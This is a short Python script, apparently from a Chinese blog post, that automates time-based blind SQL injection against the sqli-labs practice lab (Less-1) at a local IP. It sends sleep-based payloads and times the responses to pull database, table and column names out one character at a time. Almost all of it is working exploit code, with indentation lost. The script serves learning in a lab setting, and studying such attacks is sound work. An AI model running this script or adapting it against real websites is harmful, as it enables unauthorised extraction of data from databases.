import requests
import time
#目标url
url = 'http://192.168.8.152/sql/Less-1/?id=1'
#查库语句
database = 'select schema_name from information_schema.schemata'
#查当前表语句
table = 'select table_name from information_schema.tables where table_schema=database()'
#查段语句
column = 'select column_name from information_schema.columns where table_name="table_name"'
#设置一个空字符串,等会接受查询出来数据
result = ''
#i表示表的长度,一般不会超过30
for i in range(1,30):
#j表示ascii码(a-z,0-9还有一些符号_)一般也不会超过这些
for j in range(48,122):
#注入语句(此处是数字型注入)
payload = "' and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),0)--+".format(database,i,j)
#开始时间
stime = time.time()
#将网址和注入语句拼接请求
r = requests.get(url+payload)
#结束时间
etime = time.time()
#因为是盲注所以判断时间查
if etime-stime >= 2:
#将匹配到的字符添加到result中去
result += chr(j)
#打印匹配到的字符
print(result)
#跳出此次循环
break
python-盲注
最新推荐文章于 2023-04-22 18:21:40 发布